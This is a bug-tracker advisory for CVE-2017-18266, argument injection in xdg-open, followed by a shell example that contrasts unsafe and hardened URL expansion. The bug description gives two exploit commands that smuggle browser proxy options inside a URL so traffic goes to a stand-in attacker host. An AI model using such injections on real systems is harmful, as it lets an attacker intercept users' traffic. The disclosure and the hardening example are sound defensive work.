This was addressed in https://usn.ubuntu.com/usn/usn-3650-1 and in xdg-utils 1.1.2-1ubuntu3 for cosmic. Thanks for the report!

** Changed in: xdg-utils (Ubuntu)
       Status: New => Fix Released

https://bugs.launchpad.net/bugs/1772295

Title:
  CVE-2017-18266: argument injection in xdg-open

Status in Xdg-utils:
  Fix Released
Status in xdg-utils package in Ubuntu:
  Fix Released

Bug description:
  An attacker can silently set their proxy in browser settings to
  capture user's traffic, using a malformed URL in xdg-open.

  The following command tries to open Yandex main page through
  third-party proxy server.

  env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-proxy evil-site.example.org:8080'

  Another sample of an exploit with Chromium browser.

  env -i BROWSER="chromium %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.net/proxy.pac"
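
The mechanism behind the report, as an added example that is not part of the original message and is not xdg-utils code: substituting a URL into a `BROWSER` template and then letting the shell word-split the result turns whitespace inside the URL into extra arguments. The function names (`count_args`, `expand_unsafe`, `expand_safe`, `is_single_word`) are hypothetical and the sample URL is constructed from the report's Chromium case.

```sh
#!/bin/sh
# Added illustration; function names are hypothetical, not xdg-utils code.

# Print the number of argv entries received.
count_args() { echo "$#"; }

# Unsafe pattern: substitute the URL into the template, then let the shell
# word-split the result. Whitespace in the URL becomes extra arguments.
expand_unsafe() {
    template=$1; url=$2
    # shellcheck disable=SC2046,SC2059
    count_args $(printf "$template" "$url")
}

# Hardened pattern: split only the trusted template into words, then put
# the URL into the %s word so it always remains one argv entry.
expand_safe() {
    template=$1; url=$2
    set -f; set -- $template; set +f   # split template, globbing off
    n=$#
    for word in "$@"; do
        case $word in
            *%s*) set -- "$@" "${word%%%s*}${url}${word#*%s}" ;;
            *)    set -- "$@" "$word" ;;
        esac
    done
    shift "$n"                          # drop the unsubstituted words
    count_args "$@"
}

# Pre-check: a URI never contains whitespace, so refuse any value that
# splits into more or fewer than one word.
is_single_word() {
    set -f; set -- $1; set +f
    [ "$#" -eq 1 ]
}

# Constructed sample input, modelled on the report's Chromium case.
url='http://www.example.com/ --proxy-pac-url=http://dangerous.example.net/proxy.pac'
echo "unsafe argv count: $(expand_unsafe 'chromium %s' "$url")"
echo "safe argv count:   $(expand_safe 'chromium %s' "$url")"
is_single_word "$url" || echo "rejected: value is not a single word"
```

In the safe variant the browser receives the whole string as one URL argument, so the trailing text is never parsed as an option.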